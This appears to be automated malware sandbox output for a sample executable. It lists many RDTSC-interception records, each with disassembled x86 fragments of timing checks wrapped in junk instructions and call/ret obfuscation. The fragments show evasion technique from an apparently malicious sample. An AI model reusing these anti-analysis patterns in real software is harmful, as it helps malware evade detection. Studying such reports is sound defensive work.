                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 688FDD second address: 689063 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F333124C7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F333124C7D8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 and ecx, dword ptr [ebp+122D287Ch] 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F333124C7D8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a call 00007F333124C7E7h 0x0000004f mov di, D583h 0x00000053 pop edx 0x00000054 call 00007F333124C7D9h 0x00000059 pushad 0x0000005a push ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 689063 second address: 6890B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007F333123882Bh 0x0000000b jmp 00007F3331238825h 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F3331238823h 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F3331238820h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6890B0 second address: 6890BA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F333124C7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6890BA second address: 6890C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6890C0 second address: 6890D7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F333124C7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push esi 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6890D7 second address: 6890DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6890DB second address: 6890DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6890DF second address: 689104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3331238828h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 689104 second address: 68916A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F333124C7E1h 0x0000000f push 00000003h 0x00000011 or dword ptr [ebp+122D2009h], edi 0x00000017 call 00007F333124C7DDh 0x0000001c pop edi 0x0000001d push 00000000h 0x0000001f mov edi, 2EC4925Eh 0x00000024 push 00000003h 0x00000026 movzx edi, cx 0x00000029 push A43EDC76h 0x0000002e jns 00007F333124C7F4h 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F333124C7E6h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 68916A second address: 689185 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 add dword ptr [esp], 1BC1238Ah 0x0000000d lea ebx, dword ptr [ebp+12453CC0h] 0x00000013 mov esi, ecx 0x00000015 xchg eax, ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 689185 second address: 6891AB instructions: 0x00000000 rdtsc 0x00000002 je 00007F333124C7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F333124C7DEh 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 pop eax 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A9A0F second address: 6A9A13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A9A13 second address: 6A9A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F333124C7E4h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A789E second address: 6A78B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F333123881Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A7FB1 second address: 6A7FED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F333124C7E8h 0x00000009 jmp 00007F333124C7E9h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A7FED second address: 6A7FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A7FF3 second address: 6A7FF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A842B second address: 6A8431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A8431 second address: 6A8437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A85A5 second address: 6A85C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3331238828h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A87A8 second address: 6A87FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E9h 0x00000007 push edi 0x00000008 jmp 00007F333124C7DBh 0x0000000d jmp 00007F333124C7DCh 0x00000012 pop edi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 jmp 00007F333124C7DAh 0x0000001d pushad 0x0000001e popad 0x0000001f pop edx 0x00000020 jmp 00007F333124C7DCh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A87FA second address: 6A87FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6756B9 second address: 6756DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F333124C7E4h 0x00000009 jmp 00007F333124C7DBh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A911A second address: 6A9130 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3331238816h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007F333123881Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A9130 second address: 6A914B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F333124C7E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A914B second address: 6A9168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3331238827h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A9168 second address: 6A9175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F333124C7D6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A9175 second address: 6A917B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A917B second address: 6A9190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop eax 0x0000000d jo 00007F333124C7E2h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A941D second address: 6A9440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 js 00007F3331238816h 0x0000000e jmp 00007F3331238824h 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A9440 second address: 6A9468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007F333124C7DEh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A9468 second address: 6A9471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A9471 second address: 6A9477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A9477 second address: 6A9485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A95BE second address: 6A95DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F333124C7DCh 0x0000000b jc 00007F333124C7D6h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F333124C7DCh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6A95DE second address: 6A95E8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F333123881Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ACBDA second address: 6ACBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6ACBDF second address: 6ACBE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B60EB second address: 6B6115 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F333124C7E5h 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F333124C7DBh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B6115 second address: 6B611B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B611B second address: 6B6124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B6124 second address: 6B6144 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jns 00007F3331238816h 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F333123881Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B5474 second address: 6B548C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 jmp 00007F333124C7DBh 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B548C second address: 6B5490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B561B second address: 6B563D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7DCh 0x00000007 pushad 0x00000008 jmp 00007F333124C7E1h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B563D second address: 6B5643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B5C2B second address: 6B5C4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F333124C7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F333124C7DFh 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B5C4A second address: 6B5C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B5C50 second address: 6B5C54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B5DAE second address: 6B5DB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B6FE3 second address: 6B6FEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B6FEC second address: 6B6FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B709A second address: 6B709E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B7408 second address: 6B740E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B74B0 second address: 6B74B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B7E59 second address: 6B7E7B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3331238821h 0x00000008 jmp 00007F333123881Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 js 00007F3331238816h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6B87D4 second address: 6B8838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F333124C7D6h 0x00000009 jmp 00007F333124C7E1h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 pushad 0x00000015 stc 0x00000016 or esi, 42742111h 0x0000001c popad 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007F333124C7D8h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 0000001Ah 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 jl 00007F333124C7DEh 0x0000003f push ecx 0x00000040 sbb edi, 39991334h 0x00000046 pop esi 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c push edi 0x0000004d pushad 0x0000004e popad 0x0000004f pop edi 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BA387 second address: 6BA38B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BA38B second address: 6BA3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov di, 8735h 0x0000000e adc di, E880h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push esi 0x00000018 call 00007F333124C7D8h 0x0000001d pop esi 0x0000001e mov dword ptr [esp+04h], esi 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc esi 0x0000002b push esi 0x0000002c ret 0x0000002d pop esi 0x0000002e ret 0x0000002f and edi, dword ptr [ebp+122D3776h] 0x00000035 push 00000000h 0x00000037 movsx edi, bx 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push ebx 0x00000040 pop ebx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BA3D6 second address: 6BA3E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333123881Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BB76C second address: 6BB78B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F333124C7DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d js 00007F333124C7D6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BD5B1 second address: 6BD5BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BD5BB second address: 6BD5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BD5BF second address: 6BD5C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BD5C3 second address: 6BD5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BDB78 second address: 6BDB8C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3331238816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F3331238816h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BDB8C second address: 6BDB90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BE623 second address: 6BE627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BE627 second address: 6BE62B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BE62B second address: 6BE631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BE631 second address: 6BE636 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BE636 second address: 6BE679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jnl 00007F3331238816h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 add dword ptr [ebp+1244EDBCh], edx 0x0000001f mov dword ptr [ebp+122D2E2Eh], edx 0x00000025 push 00000000h 0x00000027 call 00007F333123881Ch 0x0000002c mov si, E231h 0x00000030 pop esi 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jp 00007F3331238818h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BE679 second address: 6BE689 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F333124C7DCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BE689 second address: 6BE68D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C2498 second address: 6C24A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F333124C7DBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6BF97E second address: 6BF9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3331238822h 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c js 00007F3331238820h 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C34AE second address: 6C34B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C34B2 second address: 6C34B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C34B8 second address: 6C34C2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F333124C7DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C268D second address: 6C26DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3331238821h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc edi, 30DFE576h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 and di, EE54h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 mov eax, dword ptr [ebp+122D16ADh] 0x0000002b cmc 0x0000002c jg 00007F3331238816h 0x00000032 push FFFFFFFFh 0x00000034 ja 00007F3331238817h 0x0000003a stc 0x0000003b nop 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 je 00007F3331238816h 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeRDTSC instruction interceptor: First address: 6C26DF second address: 6C26E9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F333124C7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
